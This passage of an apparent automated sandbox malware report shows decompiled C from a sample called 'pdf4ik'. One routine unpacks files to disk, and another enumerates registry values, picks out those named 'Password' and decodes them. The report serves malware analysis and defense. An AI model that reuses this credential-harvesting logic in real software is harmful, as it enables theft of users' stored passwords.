				signed int _t140;
				signed int _t142;
				signed int _t145;
				signed int _t160;
				void* _t161;
				intOrPtr _t167;
				signed int _t170;
				signed int _t172;
				signed int* _t175;
				intOrPtr* _t178;
				signed int _t190;
				signed int _t195;
				signed int _t206;
				void* _t210;
				signed int _t213;
				long _t225;
				signed int _t227;
				signed int _t229;
				signed int _t230;
				signed int _t232;
				void* _t233;
				signed int _t234;
				signed int _t236;
				void* _t237;
				void* _t239;
				void* _t240;

				_t210 = __edx;
				_t179 = __ecx;
				_t108 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t108 ^ _t236;
				_t229 = _a16;
				_t175 = __ecx;
				_v856 = __ecx;
				_v852 = _a8;
				if(_t229 == 3) {
					_t111 =  *((intOrPtr*)(__ecx + 4));
					_t229 = _a4;
					__eflags = _t229 - _t111;
					if(_t229 == _t111) {
						L17:
						_t211 = _v852;
						_t181 = _a12;
						_t229 = E29D8D3D0( *_t175, _a12, _v852,  &_v845);
						__eflags = _t229;
						if(_t229 <= 0) {
							_t224 =  *_t175;
							E29D8D630(_t181,  *_t175);
							_t175[1] = 0xffffffff;
						}
						__eflags = _v845;
						if(_v845 == 0) {
							__eflags = _t229;
							if(_t229 <= 0) {
								_t41 = _t229 + 0x6a; // 0x6a
								asm("sbb eax, eax");
								__eflags = _v8 ^ _t236;
								return E29DADF46(( ~_t41 & 0x04fff000) + 0x1000, _t175, _v8 ^ _t236, _t211, _t224, _t229);
							} else {
								__eflags = _v8 ^ _t236;
								return E29DADF46(0x600, _t175, _v8 ^ _t236, _t211, _t224, _t229);
							}
						} else {
							goto L20;
						}
					} else {
						__eflags = _t111 - 0xffffffff;
						if(_t111 != 0xffffffff) {
							_t224 =  *__ecx;
							E29D8D630(__ecx,  *__ecx);
						}
						_t124 =  *_t175;
						_t175[1] = 0xffffffff;
						__eflags = _t229 -  *((intOrPtr*)(_t124 + 4));
						if(_t229 >=  *((intOrPtr*)(_t124 + 4))) {
							goto L3;
						} else {
							__eflags = _t229 -  *((intOrPtr*)(_t124 + 0x10));
							if(_t229 <  *((intOrPtr*)(_t124 + 0x10))) {
								E29D8CE10(_t124);
								_t229 = _a4;
							}
							_t190 =  *_t175;
							__eflags =  *((intOrPtr*)(_t190 + 0x10)) - _t229;
							if( *((intOrPtr*)(_t190 + 0x10)) < _t229) {
								do {
									_t230 =  *_t175;
									__eflags = _t230;
									if(_t230 != 0) {
										__eflags =  *(_t230 + 0x18);
										if( *(_t230 + 0x18) != 0) {
											_t131 =  *((intOrPtr*)(_t230 + 0x10)) + 1;
											__eflags = _t131 -  *((intOrPtr*)(_t230 + 4));
											if(_t131 !=  *((intOrPtr*)(_t230 + 4))) {
												 *((intOrPtr*)(_t230 + 0x10)) = _t131;
												 *((intOrPtr*)(_t230 + 0x14)) =  *((intOrPtr*)(_t230 + 0x14)) +  *((intOrPtr*)(_t230 + 0x50)) +  *((intOrPtr*)(_t230 + 0x4c)) +  *((intOrPtr*)(_t230 + 0x48)) + 0x2e;
												_t134 = E29D8CA10(_t230, _t230 + 0x28, _t230 + 0x78, 0, 0);
												_t237 = _t237 + 0x10;
												asm("sbb eax, eax");
												_t136 =  ~_t134 + 1;
												__eflags = _t136;
												 *(_t230 + 0x18) = _t136;
											}
										}
									}
									_t213 =  *_t175;
									__eflags =  *((intOrPtr*)(_t213 + 0x10)) - _a4;
								} while ( *((intOrPtr*)(_t213 + 0x10)) < _a4);
							}
							E29D8D260( *_t175, _t175[0x4e], _t175[0x4e]);
							_t128 = _v856;
							_t237 = _t237 + 4;
							_t128[1] = _a4;
							_t175 = _t128;
							goto L17;
						}
					}
				} else {
					if(_t229 == 2 || _t229 == 1) {
						__eflags = _t175[1] - 0xffffffff;
						if(_t175[1] != 0xffffffff) {
							E29D8D630(_t179,  *_t175);
						}
						_t139 =  *_t175;
						_t224 = _a4;
						_t175[1] = 0xffffffff;
						__eflags = _t224 -  *((intOrPtr*)(_t139 + 4));
						if(_t224 >=  *((intOrPtr*)(_t139 + 4))) {
							goto L3;
						} else {
							__eflags = _t224 -  *((intOrPtr*)(_t139 + 0x10));
							if(_t224 <  *((intOrPtr*)(_t139 + 0x10))) {
								E29D8CE10(_t139);
								_t229 = _a16;
							}
							_t140 =  *_t175;
							__eflags =  *((intOrPtr*)(_t140 + 0x10)) - _t224;
							if( *((intOrPtr*)(_t140 + 0x10)) < _t224) {
								do {
									_t234 =  *_t175;
									__eflags = _t234;
									if(_t234 != 0) {
										__eflags =  *(_t234 + 0x18);
										if( *(_t234 + 0x18) != 0) {
											_t167 =  *((intOrPtr*)(_t234 + 0x10)) + 1;
											__eflags = _t167 -  *((intOrPtr*)(_t234 + 4));
											if(_t167 !=  *((intOrPtr*)(_t234 + 4))) {
												 *((intOrPtr*)(_t234 + 0x14)) =  *((intOrPtr*)(_t234 + 0x14)) +  *((intOrPtr*)(_t234 + 0x50)) +  *((intOrPtr*)(_t234 + 0x4c)) +  *((intOrPtr*)(_t234 + 0x48)) + 0x2e;
												 *((intOrPtr*)(_t234 + 0x10)) = _t167;
												_t170 = E29D8CA10(_t234, _t234 + 0x28, _t234 + 0x78, 0, 0);
												_t237 = _t237 + 0x10;
												asm("sbb eax, eax");
												_t172 =  ~_t170 + 1;
												__eflags = _t172;
												 *(_t234 + 0x18) = _t172;
											}
										}
									}
									_t206 =  *_t175;
									__eflags =  *((intOrPtr*)(_t206 + 0x10)) - _t224;
								} while ( *((intOrPtr*)(_t206 + 0x10)) < _t224);
								_t229 = _a16;
							}
							_t194 = _t175;
							E29D8D7B0(_t175,  &_v844, _t224);
							_t211 = _v580 >> 4;
							__eflags = _t211 & 0x00000001;
							if((_t211 & 0x00000001) != 0) {
								L20:
								__eflags = _v8 ^ _t236;
								return E29DADF46(0, _t175, _v8 ^ _t236, _t211, _t224, _t229);
							} else {
								_v540 = 0;
								__eflags = _t229 - 1;
								if(_t229 != 1) {
									_t224 = _v852;
									_t232 = _t224;
									_t142 =  *_t232;
									_t195 = _t232;
									__eflags = _t142;
									while(_t142 != 0) {
										__eflags = _t142 - 0x2f;
										if(_t142 == 0x2f) {
											L43:
											_t224 = _t195 + 1;
										} else {
											__eflags = _t142 - 0x5c;
											if(_t142 == 0x5c) {
												goto L43;
											}
										}
										_t142 =  *(_t195 + 1);
										_t195 = _t195 + 1;
										__eflags = _t142;
									}
									E29DAE8E8( &_v276, _t232, 0x104);
									_t239 = _t237 + 0xc;
									__eflags = _t224 - _t232;
									if(_t224 != _t232) {
										 *((char*)(_t236 + _t224 - _t232 - 0x110)) = 0;
										_t145 = _v276;
										__eflags = _t145 - 0x2f;
										if(_t145 == 0x2f) {
											L55:
											wsprintfA( &_v540, "%s%s",  &_v276, _t224);
											_t237 = _t239 + 0x10;
											goto L48;
										} else {
											__eflags = _t145 - 0x5c;
											if(_t145 == 0x5c) {
												goto L55;
											} else {
												__eflags = _t145;
												if(_t145 == 0) {
													goto L47;
												} else {
													__eflags = _v275 - 0x3a;
													if(_v275 != 0x3a) {
														goto L47;
													} else {
														goto L55;
													}
												}
											}
										}
										goto L73;
									} else {
										_v276 = 0;
										L47:
										wsprintfA( &_v540, "%s%s%s",  &(_t175[0x50]),  &_v276, _t224);
										_t237 = _t239 + 0x14;
									}
									L48:
									_t194 = _v580;
									_t211 =  &_v540;
									_t233 = CreateFileA( &_v540, 0x40000000, 0, 0, 2, _v580, 0);
								} else {
									_t233 = _v852;
								}
								__eflags = _t233 - 0xffffffff;
								if(_t233 != 0xffffffff) {
									E29D8D260( *_t175, _t194, _t175[0x4e]);
									_t178 = _v856;
									_t240 = _t237 + 4;
									__eflags =  *(_t178 + 0x13c);
									if(__eflags == 0) {
										_t161 = E29DAD4FB(_t178, _t211, _t224, _t233, __eflags, 0x4000);
										_t240 = _t240 + 4;
										 *(_t178 + 0x13c) = _t161;
									}
									_v852 = 0;
									while(1) {
										_t220 =  *(_t178 + 0x13c);
										_t199 = 0x4000;
										_t225 = E29D8D3D0( *_t178, 0x4000,  *(_t178 + 0x13c),  &_v845);
										_t240 = _t240 + 8;
										__eflags = _t225 - 0xffffff96;
										if(_t225 == 0xffffff96) {
											break;
										}
										__eflags = _t225;
										if(__eflags < 0) {
											L65:
											_v852 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L63:
												__eflags = _v845;
												if(_v845 == 0) {
													__eflags = _t225;
													if(_t225 != 0) {
														continue;
													} else {
														goto L65;
													}
												}
											} else {
												_t199 =  *(_t178 + 0x13c);
												_t160 = WriteFile(_t233,  *(_t178 + 0x13c), _t225,  &_v856, 0);
												__eflags = _t160;
												if(_t160 == 0) {
													_v852 = 0x400;
												} else {
													goto L63;
												}
											}
										}
										L66:
										E29D8D630(_t199,  *_t178);
										_t227 = _v852;
										__eflags = _t227;
										if(_t227 == 0) {
											_t220 =  &_v560;
											SetFileTime(_t233,  &_v568,  &_v576,  &_v560);
										}
										__eflags = _a16 - 1;
										if(_a16 != 1) {
											CloseHandle(_t233);
										}
										__eflags = _v8 ^ _t236;
										return E29DADF46(_t227, _t178, _v8 ^ _t236, _t220, _t227, _t233);
										goto L73;
									}
									_v852 = 0x1000;
									goto L66;
								} else {
									__eflags = _v8 ^ _t236;
									return E29DADF46(0x200, _t175, _v8 ^ _t236, _t211, _t224, _t233);
								}
							}
						}
					} else {
						L3:
						return E29DADF46(0x10000, _t175, _v8 ^ _t236, _t210, _t224, _t229);
					}
				}
				L73:
			}




















































                                        0x29d8df30
                                        0x29d8df30
                                        0x29d8df39
                                        0x29d8df40
                                        0x29d8df48
                                        0x29d8df4b
                                        0x29d8df4e
                                        0x29d8df54
                                        0x29d8df5d
                                        0x29d8df89
                                        0x29d8df8c
                                        0x29d8df8f
                                        0x29d8df91
                                        0x29d8e036
                                        0x29d8e036
                                        0x29d8e045
                                        0x29d8e04e
                                        0x29d8e053
                                        0x29d8e055
                                        0x29d8e057
                                        0x29d8e059
                                        0x29d8e05e
                                        0x29d8e05e
                                        0x29d8e065
                                        0x29d8e06c
                                        0x29d8e083
                                        0x29d8e085
                                        0x29d8e09f
                                        0x29d8e0a4
                                        0x29d8e0b6
                                        0x29d8e0c0
                                        0x29d8e087
                                        0x29d8e092
                                        0x29d8e09c
                                        0x29d8e09c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8df97
                                        0x29d8df97
                                        0x29d8df9a
                                        0x29d8df9c
                                        0x29d8df9e
                                        0x29d8df9e
                                        0x29d8dfa3
                                        0x29d8dfa5
                                        0x29d8dfac
                                        0x29d8dfaf
                                        0x00000000
                                        0x29d8dfb1
                                        0x29d8dfb1
                                        0x29d8dfb4
                                        0x29d8dfb8
                                        0x29d8dfbd
                                        0x29d8dfbd
                                        0x29d8dfc0
                                        0x29d8dfc2
                                        0x29d8dfc5
                                        0x29d8dfc7
                                        0x29d8dfc7
                                        0x29d8dfc9
                                        0x29d8dfcb
                                        0x29d8dfcd
                                        0x29d8dfd1
                                        0x29d8dfd6
                                        0x29d8dfd7
                                        0x29d8dfda
                                        0x29d8dfe7
                                        0x29d8dfee
                                        0x29d8dffd
                                        0x29d8e002
                                        0x29d8e007
                                        0x29d8e009
                                        0x29d8e009
                                        0x29d8e00a
                                        0x29d8e00a
                                        0x29d8dfda
                                        0x29d8dfd1
                                        0x29d8e00d
                                        0x29d8e012
                                        0x29d8e012
                                        0x29d8dfc7
                                        0x29d8e020
                                        0x29d8e025
                                        0x29d8e02e
                                        0x29d8e031
                                        0x29d8e034
                                        0x00000000
                                        0x29d8e034
                                        0x29d8dfaf
                                        0x29d8df5f
                                        0x29d8df62
                                        0x29d8e0c3
                                        0x29d8e0c7
                                        0x29d8e0cb
                                        0x29d8e0cb
                                        0x29d8e0d0
                                        0x29d8e0d2
                                        0x29d8e0d5
                                        0x29d8e0dc
                                        0x29d8e0df
                                        0x00000000
                                        0x29d8e0e5
                                        0x29d8e0e5
                                        0x29d8e0e8
                                        0x29d8e0ec
                                        0x29d8e0f1
                                        0x29d8e0f1
                                        0x29d8e0f4
                                        0x29d8e0f6
                                        0x29d8e0f9
                                        0x29d8e100
                                        0x29d8e100
                                        0x29d8e102
                                        0x29d8e104
                                        0x29d8e106
                                        0x29d8e10a
                                        0x29d8e10f
                                        0x29d8e110
                                        0x29d8e113
                                        0x29d8e124
                                        0x29d8e127
                                        0x29d8e136
                                        0x29d8e13b
                                        0x29d8e140
                                        0x29d8e142
                                        0x29d8e142
                                        0x29d8e143
                                        0x29d8e143
                                        0x29d8e113
                                        0x29d8e10a
                                        0x29d8e146
                                        0x29d8e148
                                        0x29d8e148
                                        0x29d8e14d
                                        0x29d8e14d
                                        0x29d8e157
                                        0x29d8e159
                                        0x29d8e164
                                        0x29d8e167
                                        0x29d8e16a
                                        0x29d8e06e
                                        0x29d8e076
                                        0x29d8e080
                                        0x29d8e170
                                        0x29d8e170
                                        0x29d8e177
                                        0x29d8e17a
                                        0x29d8e187
                                        0x29d8e18d
                                        0x29d8e18f
                                        0x29d8e191
                                        0x29d8e193
                                        0x29d8e195
                                        0x29d8e197
                                        0x29d8e199
                                        0x29d8e19f
                                        0x29d8e19f
                                        0x29d8e19b
                                        0x29d8e19b
                                        0x29d8e19d
                                        0x00000000
                                        0x00000000
                                        0x29d8e19d
                                        0x29d8e1a2
                                        0x29d8e1a5
                                        0x29d8e1a6
                                        0x29d8e1a6
                                        0x29d8e1b7
                                        0x29d8e1bc
                                        0x29d8e1bf
                                        0x29d8e1c1
                                        0x29d8e232
                                        0x29d8e23a
                                        0x29d8e240
                                        0x29d8e242
                                        0x29d8e25d
                                        0x29d8e271
                                        0x29d8e277
                                        0x00000000
                                        0x29d8e244
                                        0x29d8e244
                                        0x29d8e246
                                        0x00000000
                                        0x29d8e248
                                        0x29d8e248
                                        0x29d8e24a
                                        0x00000000
                                        0x29d8e250
                                        0x29d8e250
                                        0x29d8e257
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8e257
                                        0x29d8e24a
                                        0x29d8e246
                                        0x00000000
                                        0x29d8e1c3
                                        0x29d8e1c3
                                        0x29d8e1ca
                                        0x29d8e1e5
                                        0x29d8e1eb
                                        0x29d8e1eb
                                        0x29d8e1ee
                                        0x29d8e1ee
                                        0x29d8e202
                                        0x29d8e20f
                                        0x29d8e17c
                                        0x29d8e17c
                                        0x29d8e17c
                                        0x29d8e211
                                        0x29d8e214
                                        0x29d8e288
                                        0x29d8e28d
                                        0x29d8e293
                                        0x29d8e296
                                        0x29d8e29d
                                        0x29d8e2a4
                                        0x29d8e2a9
                                        0x29d8e2ac
                                        0x29d8e2ac
                                        0x29d8e2b2
                                        0x29d8e2c0
                                        0x29d8e2c0
                                        0x29d8e2d0
                                        0x29d8e2da
                                        0x29d8e2dc
                                        0x29d8e2df
                                        0x29d8e2e2
                                        0x00000000
                                        0x00000000
                                        0x29d8e2e8
                                        0x29d8e2ea
                                        0x29d8e317
                                        0x29d8e317
                                        0x29d8e2ec
                                        0x29d8e2ec
                                        0x29d8e30a
                                        0x29d8e30a
                                        0x29d8e311
                                        0x29d8e313
                                        0x29d8e315
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8e315
                                        0x29d8e2ee
                                        0x29d8e2ee
                                        0x29d8e300
                                        0x29d8e306
                                        0x29d8e308
                                        0x29d8e37c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8e308
                                        0x29d8e2ec
                                        0x29d8e321
                                        0x29d8e323
                                        0x29d8e328
                                        0x29d8e32e
                                        0x29d8e330
                                        0x29d8e332
                                        0x29d8e348
                                        0x29d8e348
                                        0x29d8e34e
                                        0x29d8e352
                                        0x29d8e355
                                        0x29d8e355
                                        0x29d8e362
                                        0x29d8e36d
                                        0x00000000
                                        0x29d8e36d
                                        0x29d8e370
                                        0x00000000
                                        0x29d8e216
                                        0x29d8e221
                                        0x29d8e22b
                                        0x29d8e22b
                                        0x29d8e214
                                        0x29d8e16a
                                        0x29d8df71
                                        0x29d8df71
                                        0x29d8df86
                                        0x29d8df86
                                        0x29d8df62
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: %s%s$%s%s%s$:
                                        • API String ID: 0-3034790606
                                        • Opcode ID: b0272df633d7703d65c95529dae13e44ec7d6c89422596cbf97398680605a4d9
                                        • Instruction ID: eea8014071fea52d4f662444fceb6af8bd369515bdad74c8f11c1d018c0372e3
                                        • Opcode Fuzzy Hash: b0272df633d7703d65c95529dae13e44ec7d6c89422596cbf97398680605a4d9
                                        • Instruction Fuzzy Hash: D8D107729002189BCB25DF64C880BEA73B5FF45310F04469DE9599B682D770AE87DFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D85090 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 327registrymemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 88%
                                        			E29D85090(intOrPtr* __ecx, intOrPtr* __edx, char* _a4) {
				char _v8;
				char _v16;
				signed int _v24;
				char _v1048;
				char _v2072;
				char _v3096;
				char _v3104;
				int _v3108;
				intOrPtr _v3116;
				long _v3120;
				char _v3136;
				intOrPtr _v3144;
				long _v3148;
				char _v3164;
				char _v3168;
				intOrPtr* _v3172;
				int _v3176;
				long _v3180;
				void* _v3184;
				int _v3188;
				int _v3192;
				intOrPtr* _v3196;
				intOrPtr* _v3200;
				intOrPtr* _v3204;
				char _v3208;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t141;
				signed int _t142;
				intOrPtr* _t146;
				intOrPtr* _t152;
				void* _t155;
				intOrPtr _t170;
				intOrPtr* _t178;
				intOrPtr* _t183;
				intOrPtr* _t192;
				void* _t199;
				intOrPtr _t208;
				char* _t214;
				char* _t215;
				char* _t218;
				intOrPtr* _t220;
				char* _t222;
				char* _t223;
				intOrPtr _t225;
				intOrPtr _t228;
				intOrPtr _t231;
				void* _t236;
				void* _t250;
				void* _t253;
				void* _t255;
				intOrPtr* _t257;
				void* _t258;
				intOrPtr _t259;
				intOrPtr _t260;
				void* _t261;
				intOrPtr* _t262;
				intOrPtr* _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t270;
				intOrPtr* _t271;
				signed int _t272;
				void* _t273;
				void* _t274;
				void* _t275;

				_t234 = __edx;
				_push(0xffffffff);
				_push(E29DC29B7);
				_push( *[fs:0x0]);
				_t274 = _t273 - 0xc78;
				_t141 =  *0x29dd5664; // 0xd9555f04
				_t142 = _t141 ^ _t272;
				_v24 = _t142;
				_push(_t142);
				 *[fs:0x0] =  &_v16;
				_t264 = __edx;
				_v3208 = 0;
				_t257 = __ecx;
				_v3196 = __ecx;
				_v3172 = __edx;
				_v3184 = 0x80000001;
				 *__edx = 0;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((intOrPtr*)(__edx + 8)) = 0;
				_v8 = 0;
				_v3208 = 1;
				 *__ecx = 0;
				if(RegOpenKeyExA(0x80000001, _a4, 0, 0x20019,  &_v3184) != 0) {
					L2:
					_t146 = _t264;
					L3:
					 *[fs:0x0] = _v16;
					_pop(_t258);
					_pop(_t265);
					_pop(_t199);
					return E29DADF46(_t146, _t199, _v24 ^ _t272, _t234, _t258, _t265);
				}
				_t234 =  &_v3192;
				_v3180 = 0;
				_v3192 = 0xff;
				_v3188 = 3;
				_v2072 = 0;
				if(RegEnumValueA(_v3184, 0,  &_v2072,  &_v3192, 0,  &_v3188,  &_v1048,  &_v3176) == 0) {
					while(1) {
						_v3144 = 0xf;
						_v3148 = 0;
						_v3164 = 0;
						_v3116 = 0xf;
						_v3120 = 0;
						_v3136 = 0;
						_t152 =  &_v2072;
						_v8 = 1;
						_t236 = _t152 + 1;
						do {
							_t208 =  *_t152;
							_t152 = _t152 + 1;
						} while (_t208 != 0);
						E29D892C0( &_v3164,  &_v2072, _t152 - _t236);
						_t155 = _v3188;
						_v3168 = _t155;
						_v3108 = _v3176;
						if(_t155 != 3) {
							if(_t155 != 1) {
								if(_t155 == 4) {
									_v3104 = _v1048;
								}
								L21:
								 *_t257 =  *_t257 + 1;
								_t259 =  *((intOrPtr*)(_t264 + 4));
								if( &_v3168 >= _t259) {
									L28:
									if(_t259 ==  *((intOrPtr*)(_t264 + 8))) {
										E29D89250(_t264);
									}
									_t266 =  *((intOrPtr*)(_t264 + 4));
									_v3200 = _t266;
									_v3204 = _t266;
									_v8 = 4;
									_t260 = 0xf;
									if(_t266 != 0) {
										_t101 = _t266 + 4; // 0x5
										_t214 = _t101;
										 *_t266 = _v3168;
										 *((intOrPtr*)(_t214 + 0x14)) = 0xf;
										 *((intOrPtr*)(_t214 + 0x10)) = 0;
										 *_t214 = 0;
										E29D894C0(_t214,  &_v3164, 0, 0xffffffff);
										_t105 = _t266 + 0x20; // 0x21
										_t215 = _t105;
										_v8 = 5;
										 *((intOrPtr*)(_t215 + 0x14)) = 0xf;
										 *((intOrPtr*)(_t215 + 0x10)) = 0;
										 *_t215 = 0;
										E29D894C0(_t215,  &_v3136, 0, 0xffffffff);
										 *((intOrPtr*)(_t266 + 0x3c)) = _v3108;
										 *(_t266 + 0x40) = _v3104;
									}
									 *((intOrPtr*)(_v3172 + 4)) =  *((intOrPtr*)(_v3172 + 4)) + 0x44;
									L33:
									_v3180 = _v3180 + 1;
									_v8 = 0;
									_v3192 = 0x400;
									_v3176 = 0x400;
									if(_v3116 >= 0x10) {
										_push(_v3136);
										E29DADF3B();
										_t274 = _t274 + 4;
									}
									_v3116 = _t260;
									_v3120 = 0;
									_v3136 = 0;
									if(_v3144 >= 0x10) {
										_push(_v3164);
										E29DADF3B();
										_t274 = _t274 + 4;
									}
									_t234 = _v3184;
									_v3144 = _t260;
									_v3148 = 0;
									_v3164 = 0;
									if(RegEnumValueA(_v3184, _v3180,  &_v2072,  &_v3192, 0,  &_v3188,  &_v1048,  &_v3176) == 0) {
										_t264 = _v3172;
										_t257 = _v3196;
										continue;
									} else {
										_t146 = _v3172;
										goto L3;
									}
								}
								_t170 =  *_t264;
								_t218 =  &_v3168;
								if(_t170 > _t218) {
									goto L28;
								}
								_t220 = _v3172;
								_t270 = (0x78787879 * (_t218 - _t170) >> 0x20 >> 5 >> 0x1f) + (0x78787879 * (_t218 - _t170) >> 0x20 >> 5);
								if(_t259 ==  *((intOrPtr*)(_t220 + 8))) {
									E29D89250(_t220);
									_t220 = _v3172;
								}
								_t271 =  *((intOrPtr*)(_t220 + 4));
								_t262 =  *_t220 + ((_t270 << 4) + _t270) * 4;
								_v3204 = _t271;
								_v3200 = _t271;
								_v8 = 2;
								if(_t271 != 0) {
									 *_t271 =  *_t262;
									_t79 = _t271 + 4; // 0x5
									_t222 = _t79;
									 *((intOrPtr*)(_t222 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t222 + 0x10)) = 0;
									 *_t222 = 0;
									E29D894C0(_t222, _t262 + 4, 0, 0xffffffff);
									_t83 = _t271 + 0x20; // 0x21
									_t223 = _t83;
									_v8 = 3;
									 *((intOrPtr*)(_t223 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t223 + 0x10)) = 0;
									 *_t223 = 0;
									E29D894C0(_t223, _t262 + 0x20, 0, 0xffffffff);
									 *((intOrPtr*)(_t271 + 0x3c)) =  *((intOrPtr*)(_t262 + 0x3c));
									_t220 = _v3172;
									 *((intOrPtr*)(_t271 + 0x40)) =  *((intOrPtr*)(_t262 + 0x40));
								}
								 *((intOrPtr*)(_t220 + 4)) =  *((intOrPtr*)(_t220 + 4)) + 0x44;
								_t260 = 0xf;
								goto L33;
							}
							_t178 =  &_v1048;
							_t250 = _t178 + 1;
							do {
								_t225 =  *_t178;
								_t178 = _t178 + 1;
							} while (_t225 != 0);
							E29D892C0( &_v3136,  &_v1048, _t178 - _t250);
							goto L21;
						}
						if(StrStrA( &_v2072, "Password") == 0) {
							E29D89910( &_v1048, "%S",  &_v1048);
							_t183 =  &_v1048;
							_t274 = _t274 + 8;
							_t253 = _t183 + 1;
							do {
								_t228 =  *_t183;
								_t183 = _t183 + 1;
							} while (_t228 != 0);
							E29D892C0( &_v3136,  &_v1048, _t183 - _t253);
							goto L21;
						}
						_t261 = E29D85010( &_v1048, _v3176);
						E29DAE6AF( &_v3096, 0x400, _t261);
						_t275 = _t274 + 0x14;
						HeapFree(GetProcessHeap(), 0, _t261);
						_t192 =  &_v3096;
						_t255 = _t192 + 1;
						do {
							_t231 =  *_t192;
							_t192 = _t192 + 1;
						} while (_t231 != 0);
						E29D892C0( &_v3136,  &_v3096, _t192 - _t255);
						E29DAE6AF( &_v3096, 0x400, 0x29dcd617);
						_t257 = _v3196;
						_t274 = _t275 + 0xc;
						goto L21;
					}
				}
				goto L2;
			}






































































                                        0x29d85090
                                        0x29d85093
                                        0x29d85095
                                        0x29d850a0
                                        0x29d850a1
                                        0x29d850a7
                                        0x29d850ac
                                        0x29d850ae
                                        0x29d850b4
                                        0x29d850b8
                                        0x29d850c3
                                        0x29d850c5
                                        0x29d850cb
                                        0x29d850cd
                                        0x29d850d3
                                        0x29d850d9
                                        0x29d850e3
                                        0x29d850e5
                                        0x29d850e8
                                        0x29d850f9
                                        0x29d85101
                                        0x29d8510b
                                        0x29d85115
                                        0x29d8516d
                                        0x29d8516d
                                        0x29d8516f
                                        0x29d85172
                                        0x29d8517a
                                        0x29d8517b
                                        0x29d8517c
                                        0x29d8518a
                                        0x29d8518a
                                        0x29d85133
                                        0x29d85143
                                        0x29d85149
                                        0x29d85153
                                        0x29d8515d
                                        0x29d8516b
                                        0x29d8519c
                                        0x29d851a1
                                        0x29d851a7
                                        0x29d851ad
                                        0x29d851b3
                                        0x29d851b9
                                        0x29d851bf
                                        0x29d851c5
                                        0x29d851cb
                                        0x29d851d2
                                        0x29d851d5
                                        0x29d851d5
                                        0x29d851d7
                                        0x29d851d8
                                        0x29d851ec
                                        0x29d851f1
                                        0x29d851fd
                                        0x29d85203
                                        0x29d8520c
                                        0x29d852f1
                                        0x29d85321
                                        0x29d85329
                                        0x29d85329
                                        0x29d8532f
                                        0x29d8532f
                                        0x29d85331
                                        0x29d8533c
                                        0x29d853fc
                                        0x29d853ff
                                        0x29d85403
                                        0x29d85403
                                        0x29d85408
                                        0x29d8540b
                                        0x29d85411
                                        0x29d85417
                                        0x29d8541b
                                        0x29d85422
                                        0x29d8542c
                                        0x29d8542c
                                        0x29d8542f
                                        0x29d85438
                                        0x29d8543b
                                        0x29d8543f
                                        0x29d85441
                                        0x29d85448
                                        0x29d85448
                                        0x29d8544b
                                        0x29d85456
                                        0x29d85459
                                        0x29d8545d
                                        0x29d8545f
                                        0x29d8546a
                                        0x29d85473
                                        0x29d85473
                                        0x29d8547c
                                        0x29d85480
                                        0x29d85480
                                        0x29d85490
                                        0x29d85493
                                        0x29d85499
                                        0x29d854a5
                                        0x29d854ad
                                        0x29d854ae
                                        0x29d854b3
                                        0x29d854b3
                                        0x29d854b6
                                        0x29d854bc
                                        0x29d854c2
                                        0x29d854ce
                                        0x29d854d6
                                        0x29d854d7
                                        0x29d854dc
                                        0x29d854dc
                                        0x29d85502
                                        0x29d85511
                                        0x29d85517
                                        0x29d8551d
                                        0x29d8552b
                                        0x29d85190
                                        0x29d85196
                                        0x00000000
                                        0x29d85531
                                        0x29d85531
                                        0x00000000
                                        0x29d85531
                                        0x29d8552b
                                        0x29d85342
                                        0x29d85344
                                        0x29d8534c
                                        0x00000000
                                        0x00000000
                                        0x29d8535b
                                        0x29d85369
                                        0x29d8536e
                                        0x29d85370
                                        0x29d85375
                                        0x29d85375
                                        0x29d85384
                                        0x29d85387
                                        0x29d8538a
                                        0x29d85390
                                        0x29d85396
                                        0x29d8539c
                                        0x29d853a0
                                        0x29d853a4
                                        0x29d853a4
                                        0x29d853ab
                                        0x29d853b2
                                        0x29d853b6
                                        0x29d853b8
                                        0x29d853bf
                                        0x29d853bf
                                        0x29d853c2
                                        0x29d853ca
                                        0x29d853d1
                                        0x29d853d5
                                        0x29d853d7
                                        0x29d853df
                                        0x29d853e5
                                        0x29d853eb
                                        0x29d853eb
                                        0x29d853ee
                                        0x29d853f2
                                        0x00000000
                                        0x29d853f2
                                        0x29d852f3
                                        0x29d852f9
                                        0x29d85300
                                        0x29d85300
                                        0x29d85302
                                        0x29d85303
                                        0x29d85317
                                        0x00000000
                                        0x29d85317
                                        0x29d85226
                                        0x29d852bc
                                        0x29d852c1
                                        0x29d852c7
                                        0x29d852ca
                                        0x29d852d0
                                        0x29d852d0
                                        0x29d852d2
                                        0x29d852d3
                                        0x29d852e7
                                        0x00000000
                                        0x29d852e7
                                        0x29d8523f
                                        0x29d8524e
                                        0x29d85253
                                        0x29d8525f
                                        0x29d85265
                                        0x29d8526b
                                        0x29d85270
                                        0x29d85270
                                        0x29d85272
                                        0x29d85273
                                        0x29d85287
                                        0x29d8529d
                                        0x29d852a2
                                        0x29d852a8
                                        0x00000000
                                        0x29d852a8
                                        0x29d8519c
                                        0x00000000

                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,80000001,D9555F04), ref: 29D8510D
                                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?), ref: 29D85163
                                        • StrStrA.SHLWAPI(?,Password,?,?), ref: 29D8521E
                                        • _strcpy_s.LIBCMT ref: 29D8524E
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 29D85258
                                        • HeapFree.KERNEL32(00000000), ref: 29D8525F
                                        • _strcpy_s.LIBCMT ref: 29D8529D
